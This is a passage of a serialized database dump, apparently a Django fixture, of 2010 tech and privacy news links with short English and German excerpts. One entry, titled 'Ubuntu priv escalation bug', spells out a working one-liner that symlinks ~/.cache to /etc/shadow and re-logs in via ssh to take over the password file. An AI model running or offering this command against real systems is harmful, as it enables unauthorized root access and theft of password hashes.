&lt;/p&gt;</field><field type="CharField" name="external_url">http://theregister.co.uk/2010/07/08/microsoft_virtual_page_turn_patent/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/10/microsoft-seeks-patent-on-ebook-page-flip-the-re.png</field><field type="SlugField" name="slug">microsoft-seeks-patent-on-ebook-page-flip-the-re</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-10 16:36:39</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">microsoft patent</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object></field></object><object pk="293" model="submitter.newsentry"><field type="CharField" name="title">Dubai airports nix full-body scanners "out of respect for privacy of individuals and personal freedom"</field><field type="TextField" name="excerpt">Full-body scanners will not be used in Dubai airports because the systems "contradict Islam, and out of respect for the privacy of individuals and their personal freedom," said the head of the Dubai police force airport security division, in a Dubai newspaper. Brigadier Pilot Ahmad Mohammad Bin Thani added, "The scanners will be replaced with other inspection systems that reserve travellers' privacy." </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Full-body scanners will not be used in Dubai airports because the systems "contradict Islam, and out of respect for the privacy of individuals and their personal freedom," said the head of the Dubai police force airport security division, in a Dubai newspaper. Brigadier Pilot Ahmad Mohammad Bin Thani added, "The scanners will be replaced with other inspection systems that reserve travellers' privacy."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://timesofindia.indiatimes.com/world/middle-east/Body-scanners-will-not-be-used-at-Dubai-airports-Reports/articleshow/6134697.cms</field><field type="FileField" name="page_screenshot">page_shots/2010/07/10/dubai-airports-nix-full-body-scanners-out-of-resp.png</field><field type="SlugField" name="slug">dubai-airports-nix-full-body-scanners-out-of-resp</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-10 16:33:05</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">nacktscanner privacy</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="292" model="submitter.newsentry"><field type="CharField" name="title">Consumer Group Sniffs Congresswoman&amp;#8217;s Open Wi-Fi | Threat Level | Wired.com</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.wired.com/threatlevel/2010/07/congresswoman-wifi-sniffed/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/10/consumer-group-sniffs-congresswoman8217s-open-w.png</field><field type="SlugField" name="slug">consumer-group-sniffs-congresswoman8217s-open-w</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-10 09:36:29</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">google wifi</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="291" model="submitter.newsentry"><field type="CharField" name="title">NetApp threatens Coraid over sales of open-source ZFS technology &amp;mdash; EnterpriseStorageForum.com</field><field type="TextField" name="excerpt">NetApp claims Patents on ZFS</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;NetApp claims Patents on ZFS
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.enterprisestorageforum.com/storagenetworking/article.php/3891426/NetApp-threatens-Coraid-over-sales-of-open-source-ZFS-technology.htm</field><field type="FileField" name="page_screenshot">page_shots/2010/07/09/netapp-threatens-coraid-over-sales-of-open-source.png</field><field type="SlugField" name="slug">netapp-threatens-coraid-over-sales-of-open-source</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-09 22:28:04</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">netapp patent zfs</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object></field></object><object pk="290" model="submitter.newsentry"><field type="CharField" name="title">NTP sues smartphone giants over wireless e-mail patents</field><field type="TextField" name="excerpt">NTP will nach Blackberry auch Google, Apple, HTC etc. an den Kragen für "delivery of electronic mail over wireless communications systems" Patent</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;NTP will nach Blackberry auch Google, Apple, HTC etc. an den Kragen für "delivery of electronic mail over wireless communications systems" Patent
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/telecom/news/2010/07/ntp-chasing-smartphone-giants-over-wireless-e-mail-patents.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/07/09/ntp-sues-smartphone-giants-over-wireless-e-mail-pa.png</field><field type="SlugField" name="slug">ntp-sues-smartphone-giants-over-wireless-e-mail-pa</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-09 22:22:02</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">ntp patent wireless</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object></field></object><object pk="289" model="submitter.newsentry"><field type="CharField" name="title">SWIFT ist durch</field><field type="TextField" name="excerpt">Euro MPs have approved a new deal to allow US anti-terror investigators to access Europeans' bank data.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Euro MPs have approved a new deal to allow US anti-terror investigators to access Europeans' bank data.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://news.bbc.co.uk/2/hi/world/europe/10552630.stm</field><field type="FileField" name="page_screenshot">page_shots/2010/07/09/swift-ist-durch.png</field><field type="SlugField" name="slug">swift-ist-durch</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-09 21:51:46</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">swift</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="288" model="submitter.newsentry"><field type="CharField" name="title">UH computer breach exposes personal data - Pacific Business News (Honolulu)</field><field type="TextField" name="excerpt">10-jährige Datenhalde geplündert. Das ist das Problem bei diesem Ding.
Some 53,000 people may have had their personal information exposed after a breach to the University of Hawaii computer system was discovered.
The university released a statement Tuesday that more than 40,000 social security numbers and 200 credit card numbers were part of the exposed information that was housed on a computer server used by the Manoa campus parking office.
UH Manoa faculty and staff members employed in 1998, and anyone who had business with the UH Manoa Parking Office between Jan. 1, 1998 and June 30, 2009.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;10-jährige Datenhalde geplündert. Das ist das Problem bei diesem Ding.
&lt;/p&gt;
&lt;p&gt;Some 53,000 people may have had their personal information exposed after a breach to the University of Hawaii computer system was discovered.
&lt;/p&gt;
&lt;p&gt;The university released a statement Tuesday that more than 40,000 social security numbers and 200 credit card numbers were part of the exposed information that was housed on a computer server used by the Manoa campus parking office.
&lt;/p&gt;
&lt;p&gt;UH Manoa faculty and staff members employed in 1998, and anyone who had business with the UH Manoa Parking Office between Jan. 1, 1998 and June 30, 2009.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.bizjournals.com/pacific/stories/2010/07/05/daily3.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/09/uh-computer-breach-exposes-personal-data-pacific.png</field><field type="SlugField" name="slug">uh-computer-breach-exposes-personal-data-pacific</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-09 21:51:00</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">dataloss</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="10"></object></field></object><object pk="287" model="submitter.newsentry"><field type="CharField" name="title">kamera review in Dresden</field><field type="TextField" name="excerpt">Die Überwacher können schon immer in die Wohnungen gucken.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Die Überwacher können schon immer in die Wohnungen gucken.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.addn.me/freiraeume/und-wer-kontrolliert-die-ueberwacher/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/09/alternative-dresden-news-add039n-raq_.png</field><field type="SlugField" name="slug">alternative-dresden-news-add039n-raq</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-09 17:03:09</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">cctv observation</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="286" model="submitter.newsentry"><field type="CharField" name="title">iPhone on fire</field><field type="TextField" name="excerpt">fanboi burned his hand on antenna.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;fanboi burned his hand on antenna.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theinquirer.net/inquirer/news/1721684/iphone-catches</field><field type="FileField" name="page_screenshot">page_shots/2010/07/09/iphone-on-fire.png</field><field type="SlugField" name="slug">iphone-on-fire</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-09 15:59:07</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">apple iphone</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="285" model="submitter.newsentry"><field type="CharField" name="title">Cisco looses attendee db</field><field type="TextField" name="excerpt">Cisco looses attendee db for [CiscoLive](http://ciscolive2010.com) this year. Sends out message to lots of folks that did not register.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Cisco looses attendee db for &lt;a href="http://ciscolive2010.com"&gt;CiscoLive&lt;/a&gt; this year. Sends out message to lots of folks that did not register.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.networkworld.com/community/node/63432</field><field type="FileField" name="page_screenshot">page_shots/2010/07/09/unknown-title002.png</field><field type="SlugField" name="slug">unknown-title002</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-08 23:46:58</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">cisco</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="10"></object></field></object><object pk="284" model="submitter.newsentry"><field type="CharField" name="title">Ubuntu priv escalation bug</field><field type="TextField" name="excerpt">All you need to get root on Ubuntu:
rm -rf ~/.cache; ln -s /etc/shadow ~/.cache; ssh localhost (trigger pam_motd by re-logging in and you'll own /etc/shadow)</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;All you need to get root on Ubuntu:
rm -rf ~/.cache; ln -s /etc/shadow ~/.cache; ssh localhost (trigger pam_motd by re-logging in and you'll own /etc/shadow)
&lt;/p&gt;</field><field type="CharField" name="external_url">https://lists.ubuntu.com/archives/ubuntu-security-announce/2010-July/001117.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/08/ubuntu-priv-escalation-bug.png</field><field type="SlugField" name="slug">ubuntu-priv-escalation-bug</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-08 23:34:07</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">ubuntu vulnerability</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="283" model="submitter.newsentry"><field type="CharField" name="title">heise online - The Pirate Bay: 4 Millionen Nutzerdatensätze abgegriffen</field><field type="TextField" name="excerpt">4 Mio Userdatensätze bei Pirate Bay abgegriffen</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;4 Mio Userdatensätze bei Pirate Bay abgegriffen
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/The-Pirate-Bay-4-Millionen-Nutzerdatensaetze-abgegriffen-1034933.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/08/heise-online-the-pirate-bay-4-millionen-nutzerd.png</field><field type="SlugField" name="slug">heise-online-the-pirate-bay-4-millionen-nutzerd</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-08 23:24:59</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">dataloss piratebay</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="10"></object></field></object><object pk="282" model="submitter.newsentry"><field type="CharField" name="title">default snmp community strings</field><field type="TextField" name="excerpt">snmp community names hard coded to public and private. OMFG!</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;snmp community names hard coded to public and private. OMFG!
&lt;/p&gt;</field><field type="CharField" name="external_url">http://packetstormsecurity.org/filedesc/cisco-sa-20100707-snmp.txt.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/08/packet-storm-httppacketstormsecurity_.png</field><field type="SlugField" name="slug">packet-storm-httppacketstormsecurity</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-08 08:08:01</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">cisco snmp vulnerability</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="281" model="submitter.newsentry"><field type="CharField" name="title">Glocks stolen out of Israeli PM's bodyguard's luggage on American Airlines flight</field><field type="TextField" name="excerpt">Four Glock 9mm pistols belonging to Israeli PM Benjamin Netanyahu's bodyguards are missing after American Airlines sent their suitcase to LA instead of DC. The luggage has been recovered, but the guns are missing and presumed stolen. Good thing the TSA doesn't let us lock them out of our suitcases, huh? </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Four Glock 9mm pistols belonging to Israeli PM Benjamin Netanyahu's bodyguards are missing after American Airlines sent their suitcase to LA instead of DC. The luggage has been recovered, but the guns are missing and presumed stolen. Good thing the TSA doesn't let us lock them out of our suitcases, huh?
&lt;/p&gt;</field><field type="CharField" name="external_url">http://news.bbc.co.uk/2/hi/world/us_and_canada/10536793.stm</field><field type="FileField" name="page_screenshot">page_shots/2010/07/07/glocks-stolen-out-of-israeli-pms-bodyguards-lugg.png</field><field type="SlugField" name="slug">glocks-stolen-out-of-israeli-pms-bodyguards-lugg</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-07 20:01:04</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">israel politics security theater tsa</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object></field></object><object pk="280" model="submitter.newsentry"><field type="CharField" name="title">Entity Crisis: Python + Wiimote + 30 tonnes of Steel</field><field type="TextField" name="excerpt">Baggersteuerung mit 'ner WIImote
we decided... that we must add Wiimote control to our system! Yes, 15 tonne steel arms, giant claws and 200 bar of hydraulic pressure... all controlled with a flick of the wrist.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Baggersteuerung mit 'ner WIImote
we decided... that we must add Wiimote control to our system! Yes, 15 tonne steel arms, giant claws and 200 bar of hydraulic pressure... all controlled with a flick of the wrist.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://entitycrisis.blogspot.com/2009/07/python-wiimote-30-tonnes-of-steel.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/07/entity-crisis-python-wiimote-30-tonnes-of-st.png</field><field type="SlugField" name="slug">entity-crisis-python-wiimote-30-tonnes-of-st</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-07 16:25:10</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">robot wii</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="279" model="submitter.newsentry"><field type="CharField" name="title">Zwei Bildschirme: Amazon bekommt Patent auf E-Book-Reader - Golem.de</field><field type="TextField" name="excerpt">E-Book reader patent! WTF, also mit 2 Displays. Finally, computers are patented.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;E-Book reader patent! WTF, also mit 2 Displays. Finally, computers are patented.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.golem.de/1007/76288.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/07/zwei-bildschirme-amazon-bekommt-patent-auf-e-book_.png</field><field type="SlugField" name="slug">zwei-bildschirme-amazon-bekommt-patent-auf-e-book</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-07 14:20:12</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">amazon patent</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object></field></object><object pk="278" model="submitter.newsentry"><field type="CharField" name="title">TSA blocks "controversial opinion" from its internal network</field><field type="TextField" name="excerpt">The US Transport Security Agency has joined with other defenders of liberty, such as the governments of Iran and Syria, and has added a censorwall to its network that blocks "controversial opinion." Apparently the TSA's crack operatives are impressionable, easily gulled types who are at danger of becoming jihadis, polys, or possibly even liberals if they are exposed to "controversy."</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The US Transport Security Agency has joined with other defenders of liberty, such as the governments of Iran and Syria, and has added a censorwall to its network that blocks "controversial opinion." Apparently the TSA's crack operatives are impressionable, easily gulled types who are at danger of becoming jihadis, polys, or possibly even liberals if they are exposed to "controversy."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.cbsnews.com/8301-31727_162-20009642-10391695.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/07/tsa-blocks-controversial-opinion-from-its-intern.png</field><field type="SlugField" name="slug">tsa-blocks-controversial-opinion-from-its-intern</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-07 12:56:33</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">censorship, free speech, tsa</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="277" model="submitter.newsentry"><field type="CharField" name="title">Iran declares war on mullets, ponytails for men; approves of hair gel and Elvis 'dos</field><field type="TextField" name="excerpt">Iran's ministry of culture has released a catalog of government-approved hair styles, in an effort to eliminate the menace of "decadent Western cuts." According to the Islamic Republic News Agency, forbidden 'dos include ponytails, mullets and spiky hair. But styles resembling those of Elvis Presley, Simon Cowell, or eighties-era floppy fringes are totally fine. Also, hair gel in moderation is acceptable. With the exception of goatees, facial hair is frowned upon.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Iran's ministry of culture has released a catalog of government-approved hair styles, in an effort to eliminate the menace of "decadent Western cuts." According to the Islamic Republic News Agency, forbidden 'dos include ponytails, mullets and spiky hair. But styles resembling those of Elvis Presley, Simon Cowell, or eighties-era floppy fringes are totally fine. Also, hair gel in moderation is acceptable. With the exception of goatees, facial hair is frowned upon.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.france24.com/en/20100705-ponytail-men-gets-chop-iran</field><field type="FileField" name="page_screenshot">page_shots/2010/07/07/iran-declares-war-on-mullets-ponytails-for-men-a.png</field><field type="SlugField" name="slug">iran-declares-war-on-mullets-ponytails-for-men-a</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-07 12:54:18</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">censorship iran</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object><object pk="7"></object></field></object><object pk="276" model="submitter.newsentry"><field type="CharField" name="title">W00t! sends Associated Press a bill for quoting its blog</field><field type="TextField" name="excerpt">When W00t! posted its delightful notice about being acquired by Amazon, it was picked up and re-run by blogs all over the net. Not wanting to miss out on the action, the Associated Press ran the story and the text, too.
One problem: the AP has previously told bloggers that quotations -- however brief -- should be licensed before publication. They even offer these licenses. For a small fee, AP will generously allow you to quote one of its articles on your blog (provided that you don't do so in a way that criticizes the AP, of course, and they reserve the right to take the quote back at any time).
So W00t! sent the AP a bill for $17.50 for the quotation.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;When W00t! posted its delightful notice about being acquired by Amazon, it was picked up and re-run by blogs all over the net. Not wanting to miss out on the action, the Associated Press ran the story and the text, too.
One problem: the AP has previously told bloggers that quotations -- however brief -- should be licensed before publication. They even offer these licenses. For a small fee, AP will generously allow you to quote one of its articles on your blog (provided that you don't do so in a way that criticizes the AP, of course, and they reserve the right to take the quote back at any time).
So W00t! sent the AP a bill for $17.50 for the quotation.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://consumerist.com/2010/07/woot-to-ap-you-owe-us-1750-for-copying-our-content.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/07/w00t-sends-associated-press-a-bill-for-quoting-it_.png</field><field type="SlugField" name="slug">w00t-sends-associated-press-a-bill-for-quoting-it</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-07 12:52:44</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">copyfight, copyright, digital media, leistungsschutzrecht, urheberrechtsabgabe</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object><object pk="5"></object></field></object><object pk="275" model="submitter.newsentry"><field type="CharField" name="title">US will press criminal charges against Manning, alleged Wikileaks source</field><field type="TextField" name="excerpt">The U.S. military has announced that it will press criminal charges against 22 year old Pfc. Bradley E. Manning for allegedly transferring classified military information to his personal computer, "wrongfully adding unauthorized software to a Secret Internet Protocol Router network computer," obtaining "more than 150,000 classified U.S. State Department cables," and transmitting data to unauthorized persons. Possible penalties: Manning faces up to 52 years in prison.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The U.S. military has announced that it will press criminal charges against 22 year old Pfc. Bradley E. Manning for allegedly transferring classified military information to his personal computer, "wrongfully adding unauthorized software to a Secret Internet Protocol Router network computer," obtaining "more than 150,000 classified U.S. State Department cables," and transmitting data to unauthorized persons. Possible penalties: Manning faces up to 52 years in prison.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.boingboing.net/2010/07/06/us-will-press-crimin.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/07/us-will-press-criminal-charges-against-manning-al_.png</field><field type="SlugField" name="slug">us-will-press-criminal-charges-against-manning-al</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-07 12:49:17</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">censorship crime democracy privacy whistleblowing wikileaks</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="274" model="submitter.newsentry"><field type="CharField" name="title">Microsoft Spurned Researcher Collective founded</field><field type="TextField" name="excerpt">Full disclosure revival:
Updated Security researchers irked by how Microsoft responded to Google engineer Tavis Ormany's public disclosure of a zero-day Windows XP Help Center security bug have banded together to form a group called the Microsoft Spurned Researcher Collective*.
The group is forming a "union" in the belief that together they will be better placed to handle flak from Redmond and elsewhere following the publication of security flaws</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Full disclosure revival:
&lt;/p&gt;
&lt;p&gt;Updated Security researchers irked by how Microsoft responded to Google engineer Tavis Ormany's public disclosure of a zero-day Windows XP Help Center security bug have banded together to form a group called the Microsoft Spurned Researcher Collective*.
&lt;/p&gt;
&lt;p&gt;The group is forming a "union" in the belief that together they will be better placed to handle flak from Redmond and elsewhere following the publication of security flaws
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/07/06/ms_spurned_research_collective/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/06/microsoft-spurned-researcher-collective-founded.png</field><field type="SlugField" name="slug">microsoft-spurned-researcher-collective-founded</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-06 19:39:32</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">fulldisclosure microsoft</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="273" model="submitter.newsentry"><field type="CharField" name="title">iPad Flash hack spotted in the wild | TG Daily</field><field type="TextField" name="excerpt">Flash hacked into iOS (the one of Apple)</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Flash hacked into iOS (the one of Apple)
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.tgdaily.com/mobility-features/50504-ipad-flash-hack-spotted-in-the-wild</field><field type="FileField" name="page_screenshot">page_shots/2010/07/06/ipad-flash-hack-spotted-in-the-wild-tg-daily.png</field><field type="SlugField" name="slug">ipad-flash-hack-spotted-in-the-wild-tg-daily</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-06 10:34:53</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">apple flash iphone</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="272" model="submitter.newsentry"><field type="CharField" name="title">Online tax scam gang get 40 years • The Register</field><field type="TextField" name="excerpt">Ukrainer haben 1600 Fake-IDs angelegt um Steuern zurückzufordern. 40 Jahre Knast.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Ukrainer haben 1600 Fake-IDs angelegt um Steuern zurückzufordern. 40 Jahre Knast.
